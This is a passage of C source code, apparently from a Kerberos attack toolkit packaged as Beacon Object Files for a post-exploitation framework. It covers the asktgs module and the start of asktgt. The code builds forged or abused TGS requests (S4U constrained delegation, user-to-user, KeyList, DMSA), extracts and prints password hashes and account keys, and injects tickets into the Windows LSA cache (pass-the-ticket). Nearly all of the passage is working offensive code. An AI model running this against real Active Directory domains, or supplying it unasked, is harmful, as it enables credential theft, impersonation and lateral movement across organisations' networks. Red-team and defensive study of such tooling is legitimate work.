        req.req_body.etypes[etypeIndex++] = aes128_cts_hmac_sha1;
        req.req_body.etypes[etypeIndex++] = rc4_hmac;
        req.req_body.etypes[etypeIndex++] = rc4_hmac_exp;
        req.req_body.etypes[etypeIndex++] = old_exp;
    }
    else {
        req.req_body.etypes_count += 1;
        req.req_body.etypes = MemAlloc(sizeof(int) * req.req_body.etypes_count);
        if (!req.req_body.etypes) {
            PRINT_OUT("[x] Failed alloc memory");
            return TRUE;
        }
        req.req_body.etypes[etypeIndex++] = requestEType;
    }

    if (s4uUser) {
        if (u2u) {
            req.req_body.kdc_options = req.req_body.kdc_options | CANONICALIZE | ENCTKTINSKEY | FORWARDABLE | RENEWABLE | RENEWABLEOK;
            req.req_body.sname.name_type = PRINCIPAL_NT_UNKNOWN;
            req.req_body.sname.name_count = 1;
            req.req_body.sname.name_string = MemAlloc(req.req_body.sname.name_count * sizeof(void*));
            my_copybuf(&(req.req_body.sname.name_string[0]), sname, my_strlen(sname) + 1);
        }
        else if (dmsa) {
            // DMSA: sname format is KRBTGT/DomainFQDN with NT_SRV_INST type
            req.req_body.sname.name_type = PRINCIPAL_NT_SRV_INST;
            req.req_body.sname.name_count = partsCount;
            req.req_body.sname.name_string = MemAlloc(req.req_body.sname.name_count * sizeof(void*));
            for (int i = 0; i < partsCount; i++)
                my_copybuf(&(req.req_body.sname.name_string[i]), parts[i], my_strlen(parts[i]) + 1);
        }
        else {
            req.req_body.sname.name_type = PRINCIPAL_NT_PRINCIPAL;
            req.req_body.sname.name_count = 1;
            req.req_body.sname.name_string = MemAlloc(req.req_body.sname.name_count * sizeof(void*));
            my_copybuf(&(req.req_body.sname.name_string[0]), userName, my_strlen(userName) + 1);
        }

        if (opsec)
            req.req_body.etypes[etypeIndex++] = old_exp;
        else
            req.req_body.kdc_options = req.req_body.kdc_options | ENCTKTINSKEY;
    }
    else if (u2u) {
        req.req_body.kdc_options = req.req_body.kdc_options | CANONICALIZE | ENCTKTINSKEY | FORWARDABLE | RENEWABLE | RENEWABLEOK;
        req.req_body.sname.name_type = PRINCIPAL_NT_PRINCIPAL;
        req.req_body.sname.name_count = 1;
        req.req_body.sname.name_string = MemAlloc(req.req_body.sname.name_count * sizeof(void*));
        my_copybuf(&(req.req_body.sname.name_string[0]), sname, my_strlen(sname) + 1);
    }
    else {
        if (enterprise) {
            // NT_ENTERPRISE principal (user@domain or UPN format)
            req.req_body.sname.name_type = PRINCIPAL_NT_ENTERPRISE;
            req.req_body.sname.name_count = 1;
            req.req_body.sname.name_string = MemAlloc(req.req_body.sname.name_count * sizeof(void*));
            my_copybuf(&(req.req_body.sname.name_string[0]), sname, my_strlen(sname) + 1);
            req.req_body.kdc_options = req.req_body.kdc_options | CANONICALIZE;
        }
        else if (partsCount == 1) {
            // service and other unique instance (e.g. krbtgt)
            req.req_body.sname.name_type = PRINCIPAL_NT_SRV_INST;
            req.req_body.sname.name_count = 2;
            req.req_body.sname.name_string = MemAlloc(req.req_body.sname.name_count * sizeof(void*));
            my_copybuf(&(req.req_body.sname.name_string[0]), parts[0], my_strlen(parts[0]) + 1);
            my_copybuf(&(req.req_body.sname.name_string[1]), domain, my_strlen(domain) + 1);
        }
        else if (partsCount == 2) {
            //      SPN (sname/server.domain.com)
            req.req_body.sname.name_type = PRINCIPAL_NT_SRV_INST;
            req.req_body.sname.name_count = 2;
            req.req_body.sname.name_string = MemAlloc(req.req_body.sname.name_count * sizeof(void*));
            my_copybuf(&(req.req_body.sname.name_string[0]), parts[0], my_strlen(parts[0]) + 1);
            my_copybuf(&(req.req_body.sname.name_string[1]), parts[1], my_strlen(parts[1]) + 1);
        }
        else if (partsCount == 3) {
            //      SPN (sname/server.domain.com/blah)
            req.req_body.sname.name_type = PRINCIPAL_NT_SRV_HST;
            req.req_body.sname.name_count = 3;
            req.req_body.sname.name_string = MemAlloc(req.req_body.sname.name_count * sizeof(void*));
            my_copybuf(&(req.req_body.sname.name_string[0]), parts[0], my_strlen(parts[0]) + 1);
            my_copybuf(&(req.req_body.sname.name_string[1]), parts[1], my_strlen(parts[1]) + 1);
            my_copybuf(&(req.req_body.sname.name_string[2]), parts[2], my_strlen(parts[2]) + 1);
        }
        else {
            PRINT_OUT("[X] Error: invalid TGS_REQ sname '%s'\n", sname);
        }
    }

    if (renew)
        req.req_body.kdc_options = req.req_body.kdc_options | RENEW;

    KRB_CRED kirbi_tgs = { 0 };
    if (tgs) {
        int bytesTgsSize = 0;
        byte* bytesTgs = base64_decode(tgs, &bytesTgsSize);

        AsnElt   asn_KRB_CRED = { 0 };
        if (BytesToAsnDecode3(bytesTgs, bytesTgsSize, FALSE, &asn_KRB_CRED)) return TRUE;

        if (AsnGetKrbCred(&(asn_KRB_CRED.sub[0]), &kirbi_tgs)) return TRUE;

        req.req_body.additional_tickets_count = 1;
        req.req_body.additional_tickets = MemAlloc(sizeof(Ticket) * req.req_body.additional_tickets_count);
        req.req_body.additional_tickets[0] = kirbi_tgs.tickets[0];
        if (!u2u) {
            req.req_body.kdc_options = req.req_body.kdc_options | CONSTRAINED_DELEGATION | CANONICALIZE;
            req.req_body.kdc_options = req.req_body.kdc_options ^ (req.req_body.kdc_options & RENEWABLEOK);
        }
    }
    if (keyList)
        req.req_body.kdc_options = CANONICALIZE;

    byte* cksum_Bytes = NULL;
    int cksum_Bytes_length = 0;

    if (opsec || (dmsa && s4uUser)) {
        req.req_body.kdc_options = req.req_body.kdc_options | CANONICALIZE;
        if (unconstrained)
            req.req_body.kdc_options = req.req_body.kdc_options | FORWARDED;
        else
            req.req_body.kdc_options = req.req_body.kdc_options ^ (req.req_body.kdc_options & RENEWABLEOK);

        // get hostname and hostname of SPN
        int size = MAX_COMPUTERNAME_LENGTH + 2;
        char* hostname = MemAlloc(size);
        if (!hostname) {
            PRINT_OUT("[x] Failed alloc memory");
            return TRUE;
        }
        KERNEL32$GetComputerNameA(hostname, &size);
        int netbiosSize = 16;
        int numSpaces = (size < netbiosSize) ? (netbiosSize - size) : 0;
        int i = 0;
        for (; i < numSpaces; i++)
            hostname[size + i] = ' ';
        hostname[size + numSpaces] = 0;

        char* targetHostName;
        if (partsCount > 1) {
            int substrIndex = my_strfind(parts[1], '.');
            if (substrIndex < 0)
                substrIndex = my_strlen(parts[1]) + 1;

            my_copybuf(&(targetHostName), parts[1], substrIndex);
            targetHostName[substrIndex] = 0;
            StrToUpper(targetHostName);
        }
        else {
            my_copybuf(&(targetHostName), hostname, my_strlen(hostname) + 1);
        }

        // create enc-authorization-data if target host is not the local machine
        if (my_strcmp(hostname, targetHostName) && (s4uUser == NULL) && !unconstrained) {
            ADIfRelevant ifrelevant = { 0 };
            ifrelevant.ad_type = 1;
            ifrelevant.ADData_count = 2;
            ifrelevant.ADData = MemAlloc(2 * sizeof(void*));

            ADRestrictionEntry restrictions = { 0 };
            restrictions.ad_type = 141; // KERB_AUTH_DATA_TOKEN_RESTRICTIONS;
            restrictions.restriction_type = 0;
            restrictions.restriction_length = 40;
            restrictions.restriction = ADRestrictionEntry_buildTokenStruct(1, 8192);

            ADKerbLocal kerbLocal = { 0 };
            kerbLocal.ad_type = 142; // KERB_LOCAL
            kerbLocal.ad_data_length = 16;
            kerbLocal.ad_data = MemAlloc(16);
            ADVAPI32$SystemFunction036(kerbLocal.ad_data, 16);

            ifrelevant.ADData[0] = &restrictions;
            ifrelevant.ADData[1] = &kerbLocal;

            AsnElt authDataSeq = { 0 }, authDataSeqContext = { 0 };
            if (AsnADIfRelevantEncode(&ifrelevant, &authDataSeq)) return TRUE;
            if (Make3(ASN_SEQUENCE, &authDataSeq, 1, &authDataSeqContext)) return TRUE;

            byte* authorizationDataBytes = NULL;
            int authorizationDataBytesLegth = 0;
            if (AsnToBytesEncode(&authDataSeqContext, &authorizationDataBytesLegth, &authorizationDataBytes)) return TRUE;

            req.req_body.enc_authorization_data.etype = clientKey.key_type;

            byte* enc_authorization_data = NULL;
            int enc_authorization_data_length = 0;
            if (encrypt(authorizationDataBytes, authorizationDataBytesLegth, clientKey.key_value, clientKey.key_type, KRB_KEY_USAGE_TGS_REQ_ENC_AUTHOIRZATION_DATA,
                        &(req.req_body.enc_authorization_data.cipher), &(req.req_body.enc_authorization_data.cipher_size))) return TRUE;
        }

        // S4U requests have a till time of 15 minutes in the future
        if (s4uUser)
            req.req_body.till = 900; // + 15 min

        // encode req_body for authenticator cksum
        AsnElt req_Body_ASN = { 0 }, req_Body_ASNSeq = { 0 }, req_Body_ASNSeqContext = { 0 };
        if (AsnKDCReqBodyEncode(&(req.req_body), &req_Body_ASN)) return TRUE;
        if (Make3(ASN_SEQUENCE, &req_Body_ASN, 1, &req_Body_ASNSeq)) return TRUE;
        if (MakeImplicit(ASN_CONTEXT, 4, &req_Body_ASNSeq, &req_Body_ASNSeqContext)) return TRUE;

        int req_Body_Bytes_length = ValueLength(&req_Body_ASNSeqContext);
        byte* req_Body_Bytes = MemAlloc(req_Body_Bytes_length);
        req_Body_Bytes_length = EncodeValue(&req_Body_ASNSeqContext, 0, req_Body_Bytes_length, req_Body_Bytes, 0);

        checksum(clientKey.key_value, clientKey.key_size, req_Body_Bytes, req_Body_Bytes_length, KERB_CHECKSUM_RSA_MD5, KRB_KEY_USAGE_KRB_NON_KERB_CKSUM_SALT, &cksum_Bytes, &cksum_Bytes_length);
    }

    // create the PA-DATA that contains the AP-REQ w/ appropriate authenticator/etc.
    PA_DATA padata = { 0 };
    if (New_PA_DATA(domain, userName, providedTicket, clientKey, opsec, cksum_Bytes, cksum_Bytes_length, &padata)) return TRUE;

    req.pa_data_count = 1 + ((opsec || dmsa) && s4uUser) + ((s4uUser && !dmsa) || opsec || (tgs && !u2u)) + keyList;
    int padata_index = 0;
    req.pa_data = MemAlloc(req.pa_data_count * sizeof(PA_DATA));
    req.pa_data[padata_index++] = padata;

    // Add PA-DATA for KeyList request
    if (keyList) {
        PA_DATA keyListPaData = { 0 };
        if (New_PA_DATA_KeyListReq(rc4_hmac, &keyListPaData)) return TRUE;
        req.pa_data[padata_index++] = keyListPaData;
    }

    if ((opsec || dmsa) && s4uUser) {
        // real packets seem to lowercase the domain in these 2 PA_DATA's
        StrToLower(domain);
        PA_DATA s4upadata = { 0 };
        if (New_PA_DATA_s4uX509user(clientKey, s4uUser, domain, req.req_body.nonce, clientKey.key_type, dmsa, &s4upadata)) return TRUE;
        req.pa_data[padata_index++] = s4upadata;
    }

    // add final S4U PA-DATA when not a DMSA request (DMSA only uses PA_S4U_X509_USER)
    if (s4uUser && !dmsa) {
        // constrained delegation yo'
        PA_DATA s4upadata = { 0 };
        if (New_PA_DATA_s4u2self(clientKey, s4uUser, domain, &s4upadata)) return TRUE;
        req.pa_data[padata_index++] = s4upadata;
    }
    else if (opsec) {
        PA_DATA padataoptions = { 0 };
        if (New_PA_DATA_options(FALSE, TRUE, FALSE, FALSE, &padataoptions)) return TRUE;
        req.pa_data[padata_index++] = padataoptions;
    }
    else if (tgs && !u2u) {
        PA_DATA padataoptions = { 0 };
        if (New_PA_DATA_options(FALSE, FALSE, FALSE, TRUE, &padataoptions)) return TRUE;
        req.pa_data[padata_index++] = padataoptions;
    }

    AsnElt reqAsn = { 0 };
    if (ReqToAsnEncode(req, 12, &reqAsn)) return TRUE;
    if (AsnToBytesEncode(&reqAsn, reqBytesSize, reqBytes)) return TRUE;

    if (opsec && s4uUser)
        StrToUpper(domain);

    return FALSE;
}

BOOL TGS(char* userName, char* domain, Ticket providedTicket, EncryptionKey clientKey, char* service, int requestEType, char* domainController, byte* tgs, BOOL opsec, BOOL ptt, BOOL u2u, char* targetDomain, char* targetUser, BOOL display, BOOL keyList, BOOL dmsa, BOOL enterprise, byte** retTgsBytes, int* retTgsBytesLength /*BOOL roast = FALSE, string asrepkey = "" */) {

    if (keyList)
        PRINT_OUT("\n[*] Building KeyList TGS-REQ request for: '%s'\n", userName);
    else if (dmsa)
        PRINT_OUT("\n[*] Building DMSA TGS-REQ request for '%s' from '%s'\n", targetUser, userName);
    else if (service)
        PRINT_OUT("\n[*] Building TGS-REQ request for: '%s'\n", service);
    else if (u2u)
        PRINT_OUT("\n[*] Building User-to-User TGS-REQ request for: '%s'\n", userName);
    else
        PRINT_OUT("\n[*] Building TGS-REQ request\n");

    if ( u2u && tgs && service ){
        KRB_CRED kirbi_tgs = { 0 };
        int bytesTgsSize = 0;
        byte* bytesTgs = base64_decode(tgs, &bytesTgsSize);
        AsnElt   asn_KRB_CRED = { 0 };
        if (BytesToAsnDecode3(bytesTgs, bytesTgsSize, FALSE, &asn_KRB_CRED)) return TRUE;
        if (AsnGetKrbCred(&(asn_KRB_CRED.sub[0]), &kirbi_tgs)) return TRUE;

        service = kirbi_tgs.enc_part.ticket_info[0].pname.name_string[0];
    }

    byte* tgsBytes = NULL;
    int	  tgsBytesLength = 0;
    if (NewTGS_REQ(userName, domain, service, providedTicket, clientKey, requestEType, tgs, opsec, u2u, FALSE, targetDomain, targetUser, keyList, FALSE, dmsa, enterprise, &tgsBytes, &tgsBytesLength)) return TRUE;

    byte* response = NULL;
    int   responseSize = 0;
    sendBytes(domainController, "88", tgsBytes, tgsBytesLength, &response, &responseSize);
    if (responseSize == 0)
        return TRUE;

    // decode the supplied bytes to an AsnElt object
    AsnElt responseAsn = { 0 };
    if (BytesToAsnDecode(response, responseSize, &responseAsn)) return TRUE;

    if (responseAsn.tagValue == KERB_TGS_REP) {
        if (display)
            PRINT_OUT("[+] TGS request successful!\n");

        // parse the response to an TGS-REP
        TGS_REP rep = { 0 };
        if (NewTGS_REP(responseAsn, &rep)) return TRUE;

        byte* outBytes = NULL;
        int  outBytesLength = 0;
        if (decrypt(clientKey.key_value, clientKey.key_type, KRB_KEY_USAGE_TGS_REP_EP_SESSION_KEY, rep.enc_part.cipher, rep.enc_part.cipher_size, &outBytes, &outBytesLength)) return TRUE;

        AsnElt ae = { 0 };
        if (BytesToAsnDecode(outBytes, outBytesLength, &ae)) return TRUE;

        EncKDCRepPart encRepPart = { 0 };
        if (AsnGetEncKDCRepPart(&(ae.sub[0]), &encRepPart)) return TRUE;

        EncryptionKey keyListHash = { 0 };
        if (keyList)
            keyListHash = encRepPart.encryptedPaData.encryptionKey;

        // if using /opsec and the ticket is for a server configuration for unconstrained delegation, request a forwardable TGT
        if (opsec && ((encRepPart.flags & ok_as_delegate) != 0)) {
            PRINT_OUT("[*] '/opsec' passed and service ticket has the 'ok-as-delegate' flag set, requesting a delegated TGT.\n");

            int domain_length = my_strlen(domain) + 1;
            char* krbtgt_service = MemAlloc(7 + domain_length);
            MemCpy(krbtgt_service, "krbtgt/", 7);
            MemCpy(krbtgt_service + 7, domain, domain_length);

            byte* tgtBytes = NULL;
            int	  tgtBytesLength = 0;
            if (NewTGS_REQ(userName, domain, krbtgt_service, providedTicket, clientKey, requestEType, tgs, opsec, FALSE, TRUE, NULL, NULL, keyList, FALSE, FALSE, FALSE, &tgtBytes, &tgtBytesLength)) return TRUE;

            byte* tgt_response = NULL;
            int   tgt_responseSize = 0;
            sendBytes(domainController, "88", tgtBytes, tgtBytesLength, &tgt_response, &tgt_responseSize);
        }

        // build the final KRB-CRED structure
        KRB_CRED cred = { 0 };
        cred.pvno = 5;
        cred.msg_type = 22;
        cred.ticket_count = 1;
        cred.tickets = MemAlloc(cred.ticket_count * sizeof(Ticket));
        if (!cred.tickets) {
            PRINT_OUT("[x] Failed alloc memory");
            return TRUE;
        }
        cred.tickets[0] = rep.ticket;

        // build the EncKrbCredPart/KrbCredInfo parts from the ticket and the data in the encRepPart
        KrbCredInfo info = { 0 };

        info.key = encRepPart.key;
        if (my_copybuf(&(info.key.key_value), encRepPart.key.key_value, encRepPart.key.key_size)) return TRUE;

        if (my_copybuf(&(info.prealm), rep.crealm, my_strlen(rep.crealm) + 1)) return TRUE;

        info.pname = rep.cname;
        info.pname.name_string = MemAlloc(info.pname.name_count * sizeof(void*));
        for (int i = 0; i < info.pname.name_count; i++)
            if (my_copybuf(&(info.pname.name_string[i]), rep.cname.name_string[i], my_strlen(rep.cname.name_string[i]) + 1)) return TRUE;

        info.flags = encRepPart.flags;
        info.starttime = encRepPart.starttime;
        info.endtime = encRepPart.endtime;
        info.renew_till = encRepPart.renew_till;

        if (my_copybuf(&(info.srealm), rep.crealm, my_strlen(rep.crealm) + 1)) return TRUE;

        info.sname = encRepPart.sname;
        info.sname.name_string = MemAlloc(info.sname.name_count * sizeof(void*));
        for (int i = 0; i < info.sname.name_count; i++)
            if (my_copybuf(&(info.sname.name_string[i]), encRepPart.sname.name_string[i], my_strlen(encRepPart.sname.name_string[i]) + 1)) return TRUE;

        cred.enc_part.ticket_count = 1;
        cred.enc_part.ticket_info = MemAlloc(cred.enc_part.ticket_count * sizeof(KrbCredInfo));
        if (!cred.enc_part.ticket_info) {
            PRINT_OUT("[x] Failed alloc memory");
            return TRUE;
        }
        cred.enc_part.ticket_info[0] = info;

        AsnElt asnCred = { 0 };
        if (AsnKrbCredEncode(&cred, &asnCred)) return TRUE;

        byte* kirbiBytes = NULL;
        int   kirbiBytesSize = 0;
        if (AsnToBytesEncode(&asnCred, &kirbiBytesSize, &kirbiBytes)) return TRUE;

        char* ticket = base64_encode(kirbiBytes, kirbiBytesSize);

        PRINT_OUT("[*] base64(ticket.kirbi):\n\n%s\n\n", ticket);

        if (display) {
            DescribeTicket(ticket);
            if (keyList) {
                PRINT_OUT("  Password Hash            :  ");
                if (keyListHash.key_size) {
                    int hexHashLength = keyListHash.key_size * 2 + 1;
                    char* hex_hash = MemAlloc(hexHashLength);
                    my_tohex(keyListHash.key_value, keyListHash.key_size, hex_hash, hexHashLength);
                    PRINT_OUT("[*]\t aes256_cts_hmac_sha1 \t: %s\n", hex_hash);
                }
                else {
                    PRINT_OUT("None");
                }
                PRINT_OUT("\n");
            }
            
            if (dmsa && encRepPart.encryptedPaData.keytype == 171) {

                DmsaKeyPackage* pkg = &(encRepPart.encryptedPaData.dmsaKeyPackage);
                if (pkg->currentKeysCount > 0 && pkg->currentKeys) {
                    PRINT_OUT("  [*] Current keys:\n");
                    for (int k = 0; k < pkg->currentKeysCount; k++) {
                        EncryptionKey* key = &(pkg->currentKeys[k]);
                        if (key->key_value && key->key_size > 0) {
                            int hexLen = key->key_size * 2 + 1;
                            char* hexKey = MemAlloc(hexLen);
                            if (hexKey) {
                                my_tohex(key->key_value, key->key_size, &hexKey, hexLen);

                                char* etypeName = "unknown";
                                if (key->key_type == 18) etypeName = "aes256_cts_hmac_sha1_96";
                                else if (key->key_type == 17) etypeName = "aes128_cts_hmac_sha1_96";
                                else if (key->key_type == 23) etypeName = "rc4_hmac               ";
                                else if (key->key_type == 3) etypeName = "des_cbc_md5            ";

                                PRINT_OUT("      %s : %s\n", etypeName, hexKey);
                            }
                        }
                    }
                }

                if (pkg->previousKeysCount > 0 && pkg->previousKeys) {
                    PRINT_OUT("  [*] Previous keys:\n");
                    for (int k = 0; k < pkg->previousKeysCount; k++) {
                        EncryptionKey* key = &(pkg->previousKeys[k]);
                        if (key->key_value && key->key_size > 0) {
                            int hexLen = key->key_size * 2 + 1;
                            char* hexKey = MemAlloc(hexLen);
                            if (hexKey) {
                                my_tohex(key->key_value, key->key_size, &hexKey, hexLen);

                                char* etypeName = "unknown";
                                if (key->key_type == 18) etypeName = "aes256_cts_hmac_sha1_96";
                                else if (key->key_type == 17) etypeName = "aes128_cts_hmac_sha1_96";
                                else if (key->key_type == 23) etypeName = "rc4_hmac               ";
                                else if (key->key_type == 3) etypeName = "des_cbc_md5            ";

                                PRINT_OUT("      %s : %s\n", etypeName, hexKey);
                            }
                        }
                    }
                }
            }
        }
        if (ptt)
            PTT(NULL, ticket);

        *retTgsBytes = kirbiBytes;
        *retTgsBytesLength = kirbiBytesSize;
        return FALSE;
    }
    else if (responseAsn.tagValue == KERB_ERROR) {
        uint error_code = 0;
        if (AsnGetErrorCode(&(responseAsn.sub[0]), &error_code)) return TRUE;
        PRINT_OUT("\n\t[x] Kerberos error : %d\n", error_code);
//        PRINT_OUT("\n\t[x] Kerberos error : %s\n", lookupKrbErrorCode(error_code));
    }
    else {
        PRINT_OUT("\n[X] Unknown application tag: %d\n", responseAsn.tagValue);
    }

    return TRUE;
}

BOOL AskTGS(KRB_CRED kirbi, char* service, int requestEType, char* dc, byte* tgs, BOOL opsec, BOOL ptt, BOOL u2u, char* targetDomain, char* targetUser, BOOL display, BOOL keyList, BOOL dmsa, BOOL enterprise /*, BOOL roast = FALSE, string servicekey = "", string asrepkey = "" */) {
    char* userName = kirbi.enc_part.ticket_info[0].pname.name_string[0];
    char* domain = kirbi.enc_part.ticket_info[0].prealm;
    Ticket ticket = kirbi.tickets[0];
    EncryptionKey clientKey = kirbi.enc_part.ticket_info[0].key;

    int svcCount = 0;
    char** services = my_strsplit( service, ',', &svcCount );

    for (int i = 0; i < svcCount; i++) {
        byte* tgsBytes = NULL;
        int tgsBytesLength = 0;
        TGS(userName, domain, ticket, clientKey, services[i], requestEType, dc, tgs, opsec, ptt, FALSE, targetDomain, targetUser, display, keyList, dmsa, enterprise, &tgsBytes, &tgsBytesLength /* roast, asrepkey */);
    }
    return FALSE;
}

void AskTGSExecute(byte* ticket, char* service, int requestEType, char* dc, byte* tgs, bool opsec, bool u2u, bool ptt, bool keyList, bool dmsa, bool enterprise, char* targetDomain, char* targetUser ) {
    int bytesSize = 0;
    byte* bytes = base64_decode(ticket, &bytesSize);

    KRB_CRED kirbi = { 0 };
    AsnElt   asn_KRB_CRED = { 0 };
    if (BytesToAsnDecode3(bytes, bytesSize, FALSE, &asn_KRB_CRED)) return;

    AsnGetKrbCred(&(asn_KRB_CRED.sub[0]), &kirbi);

    AskTGS( kirbi, service, requestEType, dc, tgs, opsec, ptt, u2u, targetDomain, targetUser, TRUE, keyList, dmsa, enterprise );
}

void ASK_TGS_RUN( PCHAR Buffer, DWORD Length ) {
    PRINT_OUT("[*] Action: Ask TGS\r\n");

    char* dc           = NULL;
    char* domain       = NULL;
    char* service      = NULL;
    byte* ticket       = NULL;
    char* s_enctype    = NULL;
    byte* tgs          = NULL;
    char* targetDomain = NULL;
    char* targetUser   = NULL;
    int   encType      = subkey_keymaterial;
    bool  ptt          = FALSE;
    bool  opsec        = FALSE;
    bool  keyList      = FALSE;
    bool  u2u          = FALSE;
    bool  dmsa         = FALSE;
    bool  enterprise   = FALSE;

    for (int i = 0; i < Length; i++) {
        i += GetStrParam(Buffer + i, Length - i, "/service:", 9, &service );
        i += GetStrParam(Buffer + i, Length - i, "/ticket:", 8, &ticket );
        i += GetStrParam(Buffer + i, Length - i, "/domain:", 8, &domain );
        i += GetStrParam(Buffer + i, Length - i, "/dc:", 4, &dc );
        i += GetStrParam(Buffer + i, Length - i, "/tgs:", 5, &tgs );
        i += GetStrParam(Buffer + i, Length - i, "/targetdomain:", 14, &targetDomain );
        i += GetStrParam(Buffer + i, Length - i, "/targetuser:", 12, &targetUser );
        i += GetStrParam(Buffer + i, Length - i, "/enctype:", 9, &s_enctype );
        i += IsSetParam(Buffer + i, Length - i, "/ptt", 4, &ptt );
        i += IsSetParam(Buffer + i, Length - i, "/opsec", 6, &opsec );
        i += IsSetParam(Buffer + i, Length - i, "/keylist", 8, &keyList );
        i += IsSetParam(Buffer + i, Length - i, "/u2u", 4, &u2u );
        i += IsSetParam(Buffer + i, Length - i, "/dmsa", 5, &dmsa );
        i += IsSetParam(Buffer + i, Length - i, "/enterprise", 11, &enterprise );
    }

    if( s_enctype ) {
        if (my_strcmp(s_enctype, "rc4") == 0)
            encType = rc4_hmac;
        else if (my_strcmp(s_enctype, "aes256") == 0)
            encType = aes256_cts_hmac_sha1;
    }

    GetDomainInfo(&domain, &dc);
    if (domain == NULL || dc == NULL) {
        PRINT_OUT("[X] Could not retrieve domain information!\n\n");
        return;
    }

    if ( service == NULL  && !u2u ) {
        PRINT_OUT("[X] One or more '/service:sname/server.domain.com' specifications are needed\n");
        return;
    }

    if ( ticket )
        AskTGSExecute(ticket, service, encType, dc, tgs, opsec, u2u, ptt, keyList, dmsa, enterprise, targetDomain, targetUser);
    else
        PRINT_OUT("\n[X] A /ticket:X needs to be supplied!\n");
}

VOID go( IN PCHAR Buffer, IN ULONG Length ) {
    INIT_BOF();

    datap parser;
    BeaconDataParse(&parser, Buffer, Length);
    DWORD PARAM_SIZE = 0;
    PBYTE PARAM = BeaconDataExtract(&parser, &PARAM_SIZE);

    if( LoadFunc() )
        PRINT_OUT("%s\n", "Modules not loaded");
    else
        ASK_TGS_RUN( PARAM, PARAM_SIZE );

    FreeBank();

    END_BOF();
}

================================================
FILE: AD-BOF/Kerbeus-BOF/asktgt/asktgt.c
================================================
#include "_include/asn_decode.c"
#include "_include/asn_encode.c"
#include "_include/crypt_b64.c"
#include "_include/crypt_dec.c"
#include "_include/crypt_key.c"
#include "_include/connection.c"

HANDLE GetCurrentToken(DWORD DesiredAccess) {
    HANDLE hCurrentToken = NULL;
    if (!ADVAPI32$OpenThreadToken(KERNEL32$GetCurrentThread(), DesiredAccess, FALSE, &hCurrentToken))
        if (hCurrentToken == NULL && KERNEL32$GetLastError() == ERROR_NO_TOKEN)
            if (!ADVAPI32$OpenProcessToken(KERNEL32$GetCurrentProcess(), DesiredAccess, &hCurrentToken))
                return NULL;
    return hCurrentToken;
}

LUID GetCurrentLUID(HANDLE TokenHandle) {
    TOKEN_STATISTICS tokenStats;
    DWORD tokenSize;
    if (!ADVAPI32$GetTokenInformation(TokenHandle, TokenStatistics, &tokenStats, sizeof(tokenStats), &tokenSize))
        return (LUID) { 0 };
    return tokenStats.AuthenticationId;
}

BOOL IsSystem(HANDLE TokenHandle) {
    UCHAR bTokenUser[sizeof(TOKEN_USER) + 8 + 4 * SID_MAX_SUB_AUTHORITIES];
    PTOKEN_USER pTokenUser = (PTOKEN_USER)bTokenUser;
    ULONG cbTokenUser;
    SID_IDENTIFIER_AUTHORITY siaNT = SECURITY_NT_AUTHORITY;
    PSID pSystemSid = NULL;
    BOOL bSystem = FALSE;

    // Try to open the token of the current thread first
    if (!ADVAPI32$OpenThreadToken(KERNEL32$GetCurrentThread(), TOKEN_QUERY, TRUE, &TokenHandle)) {
        // If there is no thread token, fall back to the process token
        if (KERNEL32$GetLastError() == ERROR_NO_TOKEN) {
            if (!ADVAPI32$OpenProcessToken(KERNEL32$GetCurrentProcess(), TOKEN_QUERY, &TokenHandle)) {
                return FALSE;
            }
        } else {
            return FALSE;
        }
    }

    if (!ADVAPI32$GetTokenInformation(TokenHandle, TokenUser, pTokenUser, sizeof(bTokenUser), &cbTokenUser)) {
        return FALSE;
    }

    if (!ADVAPI32$AllocateAndInitializeSid(&siaNT, 1, SECURITY_LOCAL_SYSTEM_RID, 0, 0, 0, 0, 0, 0, 0, &pSystemSid)) {
        return FALSE;
    }

    bSystem = ADVAPI32$EqualSid(pTokenUser->User.Sid, pSystemSid);

    ADVAPI32$FreeSid(pSystemSid);

    return bSystem;
}

BOOL GetLsaHandle(HANDLE hToken, BOOL highIntegrity, HANDLE* hLsa) {
    HANDLE hLsaLocal = NULL;
    ULONG  mode = 0;
    bool   status = true;
    if (highIntegrity) {
        STRING lsaString = (STRING){ .Length = 8, .MaximumLength = 9, .Buffer = "Winlogon" };
        status = SECUR32$LsaRegisterLogonProcess(&lsaString, &hLsaLocal, &mode);
    }
    else {
        status = SECUR32$LsaConnectUntrusted(&hLsaLocal);
    }
    *hLsa = hLsaLocal;
    return status;
}

int my_isdigit(int c) {
    return (c >= '0' && c <= '9');
}

int my_islower(int c) {
    return (c >= 'a' && c <= 'z');
}

long int my_strtol(const char* str, char** endptr, int base) {
    long int result = 0;
    int sign = 1;

    if (*str == '-' || *str == '+') {
        sign = (*str == '-') ? -1 : 1;
        str++;
    }

    while (my_isdigit(*str) ||
           (base == 16 && (*str >= 'a' && *str <= 'f')) ||
           (base == 16 && (*str >= 'A' && *str <= 'F'))) {
        int digit = 0;
        if (my_isdigit(*str)) {
            digit = *str - '0';
        }
        else if (base == 16) {
            digit = (my_islower(*str) ? (*str - 'a' + 10) : (*str - 'A' + 10));
        }

        if (digit >= base)
            break;

        if (result > (LONG_MAX - digit) / base) {
            if (sign == 1)
                return LONG_MAX;
            else
                return LONG_MIN;
        }

        result = result * base + digit;
        str++;
    }

    if (endptr != NULL)
        *endptr = (char*)str;

    return result * sign;
}

void PTT(char* luid, byte* ticket) {
    HANDLE hToken = GetCurrentToken(TOKEN_QUERY);
    LUID   currentLuid = GetCurrentLUID(hToken);
    LUID   targetLuid = { 0 };
    bool   IsHighIntegrity = IsSystem(hToken);

    if (luid) {
        targetLuid.LowPart = my_strtol(luid, NULL, 16);
        if (targetLuid.LowPart == 0 || targetLuid.LowPart == LONG_MAX || targetLuid.LowPart == LONG_MIN) {
            PRINT_OUT("[x] Invalid luid\n");
            return;
        }
    }
    else {
        targetLuid = currentLuid;
    }

    if (!IsHighIntegrity && currentLuid.LowPart != targetLuid.LowPart) {
        PRINT_OUT("[X] You need to be in SYSTEM integrity.\n");
        return;
    }

    if (currentLuid.LowPart != targetLuid.LowPart)
        IsHighIntegrity = false;

    HANDLE hLsa;
    if (GetLsaHandle(hToken, IsHighIntegrity, &hLsa)) return;

    ULONG authPackage;
    LSA_STRING krbAuth = { .Buffer = "kerberos",.Length = 8,.MaximumLength = 9 };
    if (SECUR32$LsaLookupAuthenticationPackage(hLsa, &krbAuth, &authPackage) == 0) {

        int decode_ticket_size = 0;
        byte* decode_ticket = base64_decode(ticket, &decode_ticket_size);

        int submitSize = sizeof(KERB_SUBMIT_TKT_REQUEST) + decode_ticket_size;
        KERB_SUBMIT_TKT_REQUEST* submitRequest = MemAlloc(submitSize);

        submitRequest->MessageType = KerbSubmitTicketMessage;
